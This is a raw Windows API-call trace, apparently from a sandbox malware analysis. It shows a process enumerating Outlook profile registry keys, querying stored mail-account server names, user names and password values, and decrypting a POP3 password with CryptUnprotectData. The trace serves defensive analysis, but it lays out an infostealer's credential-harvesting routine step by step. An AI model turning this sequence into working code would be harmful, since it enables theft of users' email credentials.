GetProcessHeap () returned 0x6a0000 [0129.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0129.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.866] RegOpenKeyW (in: hKey=0x218, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x6bab10 | out: phkResult=0x6bab10*=0x210) returned 0x0 [0129.866] GetProcessHeap () returned 0x6a0000 [0129.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.867] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.867] GetProcessHeap () returned 0x6a0000 [0129.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.868] GetProcessHeap () returned 0x6a0000 [0129.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.869] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.870] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0129.870] GetProcessHeap () returned 0x6a0000 [0129.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.870] GetProcessHeap () returned 0x6a0000 [0129.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.870] GetProcessHeap () returned 0x6a0000 [0129.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0129.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.872] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x6baaa0 | out: phkResult=0x6baaa0*=0x204) returned 0x0 [0129.872] GetProcessHeap () returned 0x6a0000 [0129.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.873] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="00000001", pcchName=0x19fb4c) returned 0x0 [0129.873] GetProcessHeap () returned 0x6a0000 [0129.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0129.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.875] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000001", phkResult=0x6baa00 | out: phkResult=0x6baa00*=0x21c) returned 0x0 [0129.875] GetProcessHeap () returned 0x6a0000 [0129.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc078 [0129.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.876] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc078, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x6bc078, pcbData=0x19f6c0*=0x208) returned 0x2 [0129.876] GetProcessHeap () returned 0x6a0000 [0129.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0129.876] GetProcessHeap () returned 0x6a0000 [0129.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc078 [0129.877] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.878] wvsprintfW (in: param_1=0x6bc078, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0129.878] GetProcessHeap () returned 0x6a0000 [0129.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc6) returned 0x6adfd0 [0129.878] GetProcessHeap () returned 0x6a0000 [0129.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0129.878] GetProcessHeap () returned 0x6a0000 [0129.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0129.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.880] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x6baae0 | out: phkResult=0x6baae0*=0x220) returned 0x0 [0129.880] GetProcessHeap () returned 0x6a0000 [0129.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc078 [0129.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.881] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x6bc078, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0129.881] GetProcessHeap () returned 0x6a0000 [0129.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0129.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.883] RegCloseKey (hKey=0x220) returned 0x0 [0129.883] GetProcessHeap () returned 0x6a0000 [0129.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0129.883] GetProcessHeap () returned 0x6a0000 [0129.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6adfd0 | out: hHeap=0x6a0000) returned 1 [0129.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.885] RegCloseKey (hKey=0x21c) returned 0x0 [0129.885] GetProcessHeap () returned 0x6a0000 [0129.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0129.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.886] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x1, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="00000002", pcchName=0x19fb4c) returned 0x0 [0129.886] GetProcessHeap () returned 0x6a0000 [0129.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0129.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.887] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000002", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x21c) returned 0x0 [0129.887] GetProcessHeap () returned 0x6a0000 [0129.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc078 [0129.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.888] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc078, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x6bc078, pcbData=0x19f6c0*=0x1e) returned 0x0 [0129.888] GetProcessHeap () returned 0x6a0000 [0129.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.889] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.889] GetProcessHeap () returned 0x6a0000 [0129.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.890] GetProcessHeap () returned 0x6a0000 [0129.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.890] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x1c) returned 0x0 [0129.891] GetProcessHeap () returned 0x6a0000 [0129.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.891] GetProcessHeap () returned 0x6a0000 [0129.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.892] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.892] GetProcessHeap () returned 0x6a0000 [0129.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.893] GetProcessHeap () returned 0x6a0000 [0129.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.893] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.894] GetProcessHeap () returned 0x6a0000 [0129.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.894] GetProcessHeap () returned 0x6a0000 [0129.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.895] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x1a) returned 0x0 [0129.895] GetProcessHeap () returned 0x6a0000 [0129.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.897] GetProcessHeap () returned 0x6a0000 [0129.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.899] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.899] GetProcessHeap () returned 0x6a0000 [0129.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.900] GetProcessHeap () returned 0x6a0000 [0129.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.901] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x1e) returned 0x0 [0129.901] GetProcessHeap () returned 0x6a0000 [0129.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.902] GetProcessHeap () returned 0x6a0000 [0129.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.903] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.903] GetProcessHeap () returned 0x6a0000 [0129.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.912] GetProcessHeap () returned 0x6a0000 [0129.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.913] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.913] GetProcessHeap () returned 0x6a0000 [0129.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.914] GetProcessHeap () returned 0x6a0000 [0129.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.920] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.920] GetProcessHeap () returned 0x6a0000 [0129.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.921] GetProcessHeap () returned 0x6a0000 [0129.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.925] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.925] GetProcessHeap () returned 0x6a0000 [0129.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.926] GetProcessHeap () returned 0x6a0000 [0129.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.927] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.927] GetProcessHeap () returned 0x6a0000 [0129.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.927] GetProcessHeap () returned 0x6a0000 [0129.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.929] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.929] GetProcessHeap () returned 0x6a0000 [0129.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.929] GetProcessHeap () returned 0x6a0000 [0129.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.931] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.931] GetProcessHeap () returned 0x6a0000 [0129.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.932] GetProcessHeap () returned 0x6a0000 [0129.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.933] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.934] GetProcessHeap () returned 0x6a0000 [0129.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.934] GetProcessHeap () returned 0x6a0000 [0129.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.936] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.936] GetProcessHeap () returned 0x6a0000 [0129.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.936] GetProcessHeap () returned 0x6a0000 [0129.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc490 [0129.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.938] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6bc490, pcbData=0x19f6b8*=0x208) returned 0x2 [0129.938] GetProcessHeap () returned 0x6a0000 [0129.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc490 | out: hHeap=0x6a0000) returned 1 [0129.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.939] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0129.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.940] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0129.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.942] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0129.942] GetProcessHeap () returned 0x6a0000 [0129.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.943] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.943] GetProcessHeap () returned 0x6a0000 [0129.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.945] GetProcessHeap () returned 0x6a0000 [0129.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.950] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.950] GetProcessHeap () returned 0x6a0000 [0129.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.950] GetProcessHeap () returned 0x6a0000 [0129.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.951] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.952] GetProcessHeap () returned 0x6a0000 [0129.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.952] GetProcessHeap () returned 0x6a0000 [0129.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.960] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.960] GetProcessHeap () returned 0x6a0000 [0129.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.960] GetProcessHeap () returned 0x6a0000 [0129.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.962] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.962] GetProcessHeap () returned 0x6a0000 [0129.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.962] GetProcessHeap () returned 0x6a0000 [0129.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.963] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x3, pvData=0x6bae98*, pcbData=0x19f6b4*=0x121) returned 0x0 [0129.964] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x75830000 [0129.973] CryptUnprotectData (in: pDataIn=0x19f6ac, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f6b4 | out: ppszDataDescr=0x0, pDataOut=0x19f6b4) returned 1 [0129.994] GetProcessHeap () returned 0x6a0000 [0129.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x26) returned 0x6b0b80 [0129.994] LocalFree (hMem=0x6ad060) returned 0x0 [0129.994] GetProcessHeap () returned 0x6a0000 [0129.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0129.995] GetProcessHeap () returned 0x6a0000 [0129.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.995] GetProcessHeap () returned 0x6a0000 [0129.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.996] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.996] GetProcessHeap () returned 0x6a0000 [0129.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.997] GetProcessHeap () returned 0x6a0000 [0129.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.998] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.998] GetProcessHeap () returned 0x6a0000 [0129.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.998] GetProcessHeap () returned 0x6a0000 [0129.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0129.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.999] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0129.999] GetProcessHeap () returned 0x6a0000 [0130.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.000] GetProcessHeap () returned 0x6a0000 [0130.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.001] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6bae98, pcbData=0x19f6b4*=0x208) returned 0x2 [0130.001] GetProcessHeap () returned 0x6a0000 [0130.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.001] GetProcessHeap () returned 0x6a0000 [0130.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0130.002] GetProcessHeap () returned 0x6a0000 [0130.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.002] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.003] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0130.003] GetProcessHeap () returned 0x6a0000 [0130.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc6) returned 0x6ae170 [0130.003] GetProcessHeap () returned 0x6a0000 [0130.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.004] GetProcessHeap () returned 0x6a0000 